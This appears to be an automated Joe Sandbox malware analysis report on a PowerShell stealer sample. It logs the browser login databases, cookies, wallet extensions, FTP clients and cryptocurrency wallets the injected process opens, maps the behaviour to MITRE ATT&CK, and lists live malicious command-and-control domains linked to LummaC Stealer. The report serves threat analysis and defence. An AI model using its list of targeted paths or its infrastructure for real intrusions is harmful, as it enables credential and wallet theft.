      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\logins.jsonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\NIRMEKAMZHJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\SNIPGPPREPJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeDirectory queried: C:\Users\user\Documents\UBVUNTSCZJJump to behavior

      Remote Access Functionality

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK matrix, grouped by tactic (numbers in brackets are the count badges as rendered in the report):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation [12]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection [211]; DLL Side-Loading [1]; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading [1]; Virtualization/Sandbox Evasion [231]; Process Injection [211]; Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [3]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping [2]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [231]; Process Discovery [1]; Virtualization/Sandbox Evasion [231]; Application Window Discovery [1]; File and Directory Discovery [11]; System Information Discovery [32]
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Screen Capture [1]; Archive Collected Data [1]; Data from Local System [41]; Clipboard Data [3]; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel [21]; Non-Application Layer Protocol [2]; Application Layer Protocol [113]; Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1600469, Sample: 176.113.115.225.ps1, Startdate: 27/01/2025, Architecture: WINDOWS, Score: 100)

Network nodes: grapeprivatter.cyou; twc.trafficmanager.net; 7 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 5 other signatures

powershell.exe (started)
  Signatures: Query firmware table information (likely to detect VMs); Found many strings related to Crypto-Wallets (likely being stolen); Writes to foreign memory regions; Injects a PE file into a foreign processes
  Child processes started: RegSvcs.exe; wermgr.exe; conhost.exe

RegSvcs.exe
  Network: toppyneedus.biz 104.21.29.142, port 443, source ports 49743, 49751, CLOUDFLARENETUS United States
  Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal ftp login credentials; 2 other signatures

Source | Detection | Scanner | Label | Link
176.113.115.225.ps1 | 8% | ReversingLabs | Win32.Trojan.Generic |
176.113.115.225.ps1 | 11% | Virustotal | |
No Antivirus matches
No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://toppyneedus.biz/it | 100% | Avira URL Cloud | malware |
toppyneedus.biz | 100% | Avira URL Cloud | malware |
https://toppyneedus.biz/N | 100% | Avira URL Cloud | malware |
https://toppyneedus.biz/apiz | 100% | Avira URL Cloud | malware |
suggestyuoz.biz | 100% | Avira URL Cloud | malware |
grapeprivatter.cyou | 100% | Avira URL Cloud | malware |
pleasedcfrown.biz | 100% | Avira URL Cloud | malware |
http://www.microsoft.co-M1 | 0% | Avira URL Cloud | safe |
lightdeerysua.biz | 100% | Avira URL Cloud | malware |
affordtempyo.biz | 100% | Avira URL Cloud | malware |
hoursuhouy.biz | 100% | Avira URL Cloud | malware |
impolitewearr.biz | 100% | Avira URL Cloud | malware |
mixedrecipew.biz | 100% | Avira URL Cloud | malware |
https://toppyneedus.biz/apieB | 100% | Avira URL Cloud | malware |


Name | IP | Active | Malicious | Antivirus Detection | Reputation
twc.trafficmanager.net | 104.40.149.189 | true | false | | high
toppyneedus.biz | 104.21.29.142 | true | false | | high
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | high
impolitewearr.biz | unknown | unknown | false | | high
grapeprivatter.cyou | unknown | unknown | true | | unknown
time.windows.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
suggestyuoz.biz | true | Avira URL Cloud: malware | unknown
toppyneedus.biz | true | Avira URL Cloud: malware | unknown
pleasedcfrown.biz | true | Avira URL Cloud: malware | unknown
https://toppyneedus.biz/api | false | | high
grapeprivatter.cyou | true | Avira URL Cloud: malware | unknown
affordtempyo.biz | true | Avira URL Cloud: malware | unknown
lightdeerysua.biz | true | Avira URL Cloud: malware | unknown
impolitewearr.biz | true | Avira URL Cloud: malware | unknown
mixedrecipew.biz | true | Avira URL Cloud: malware | unknown
hoursuhouy.biz | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000000.00000002.1899446660.00000219BF5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000000.00000002.1878353723.00000219B0558000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.0.dr | false | | high
https://toppyneedus.biz/it | RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.microsoft.co-M1 | powershell.exe, 00000000.00000002.1914181434.00000219C75E0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://toppyneedus.biz/N | RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://github.com/Pester/Pester | powershell.exe, 00000000.00000002.1878353723.00000219AF5A7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://toppyneedus.biz/apiz | RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://toppyneedus.biz/pi | RegSvcs.exe, 00000003.00000002.1520353981.0000000001205000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000000.00000002.1899446660.00000219BF5FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1878353723.00000219B0F80000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.orgX | powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://toppyneedus.biz/ | RegSvcs.exe, 00000003.00000002.1520897255.0000000003813000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000000.00000002.1878353723.00000219AF381000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://toppyneedus.biz/apieB | RegSvcs.exe, 00000003.00000002.1520290770.00000000011E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000000.00000002.1878353723.00000219AF381000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://oneget.org | powershell.exe, 00000000.00000002.1878353723.00000219B0C0E000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.29.142 | toppyneedus.biz | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1600469
Start date and time: 2025-01-27 15:57:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 45s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 176.113.115.225.ps1
Detection: MAL
Classification: mal100.troj.spyw.evad.winPS1@6/10@4/1
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 43
• Number of non-executed functions: 60
Cookbook Comments:
• Found application associated with file extension: .ps1
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.73.29, 13.107.253.45, 40.126.31.67, 4.245.163.56
• Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7816 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
09:58:18 | API Interceptor | 41x Sleep call for process: powershell.exe modified
09:58:19 | API Interceptor | 8x Sleep call for process: RegSvcs.exe modified
09:59:09 | API Interceptor | 1x Sleep call for process: wermgr.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
104.21.29.142 | p199AjsEFs.exe | malicious | Amadey, AsyncRAT, KeyLogger, LummaC Stealer, PureLog Stealer, ReverseShell, Stealc
 | 2E02vIiMfd.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar
 | grcKLMutRS.exe | malicious | LummaC Stealer
 | 2r81fhbT6k.exe | malicious | LummaC Stealer
 | UK6dGWkIJK.exe | malicious | LummaC Stealer
 | gQE0KK1bN8.exe | malicious | LummaC Stealer, PureLog Stealer
 | 𝐒𝐞𝐭-𝐮𝐩.exe | malicious | LummaC Stealer
 | random.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer
 | cI34pCr.exe | malicious | LummaC Stealer, PureLog Stealer
 | Setup.exe | malicious | LummaC Stealer, PureLog Stealer
Match | Associated Sample Name / URL | Detection | Threat Name | Context
twc.trafficmanager.net | random.exe | malicious | Socks5Systemz | 104.40.149.189
 | new.js | malicious | Unknown | 20.101.57.9
 | KgAMzi6gQA.exe | malicious | LummaC | 20.101.57.9
 | 8dm2CHOlmZ.ps1 | malicious | Unknown | 104.40.149.189
 | 6O57pKpDUh.exe | malicious | RHADAMANTHYS | 104.40.149.189
 | 1737701406b64769aba6bf4e31e73b6a327f9369a2a4b8f163118530b67462ee0ccdc36063535.dat-decoded.exe | malicious | Remcos | 20.101.57.9
 | letsVPN.exe | malicious | Unknown | 104.40.149.189
 | Bank Slip pdf.exe | malicious | FormBook | 104.40.149.189
 | Doc_874009379.vbe | malicious | AgentTesla | 104.40.149.189
 | oQXZhkSIys.exe | malicious | Strela Stealer | 104.40.149.189
s-part-0017.t-0009.fb-t-msedge.net | http://wtsevent.com | malicious | TechSupportScam | 13.107.253.45
 | PurchaseOrder.xls | malicious | Lokibot | 13.107.253.45
 | NRKCZ1PSDM.exe | malicious | PureLog Stealer, Vidar | 13.107.253.45
 | Outstanding payment-pdf.htm | malicious | HTMLPhisher | 13.107.253.45
 | Outstanding payment-pdf.htm | malicious | HTMLPhisher | 13.107.253.45
 | W6735u7DZC.exe | malicious | CobaltStrike | 13.107.253.45
 | random.exe | malicious | LummaC Stealer | 13.107.253.45
 | Report 012425 Kcocpa.xlsx | malicious | Unknown | 13.107.253.45
 | Purchase Order 20887_;-.htm | malicious | HTMLPhisher | 13.107.253.45
 | https://xjh7bk49.r.ap-southeast-2.awstrack.me/L0/https:%2F%2Fwww.google.co.in%2Furl%3Fsa==vjKpBaQLpQHvS1PmbhjfQh2MZOm%26rct=3iDDeRIUXr7S6LM6zidxN66zaYNJJZ5uNkn5rHJaI4t4qPP8DWVO1CvZVrepUv4LpX%26sa=t%26url=amp%2Fsouthdakotacannabisdoctors.com%2Fyes%2Fport%2FIsjR3uyjLQFu2NNvooFw2%2Fd2Zsb3JlbnRpbm9AZXNwZXJpb24uY29t/1/0108019498dc9698-c28d53cc-593c-4ccb-a609-76d243112b3f-000000/ABQm9rBJLVsJGlg3PuVXRXBptDI=191&c=E,1,evnTsmcgcysrNqkRD0O-1WQRUeSPuEJ91kARRfaRPYomDXM7_8LzuEjTBUwIOx_M1zJRuiZTdEHJwjdmV3XUzNtBsS-BHGDdMGwRIQxU57Nc5yk | malicious | HTMLPhisher | 13.107.253.45
toppyneedus.biz | 4JPKDcwtDo.exe | malicious | LummaC Stealer | 172.67.149.66
 | p199AjsEFs.exe | malicious | Amadey, LummaC Stealer, Stealc | 172.67.149.66
 | VbEfsnL4cp.exe | malicious | LummaC Stealer | 172.67.149.66
 | 2E02vIiMfd.exe | malicious | LummaC, Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Vidar | 104.21.29.142
 | grcKLMutRS.exe | malicious | LummaC Stealer | 104.21.29.142
 | 4WzIkJRbcc.exe | malicious | LummaC Stealer | 172.67.149.66
 | 2r81fhbT6k.exe | malicious | LummaC Stealer | 104.21.29.142
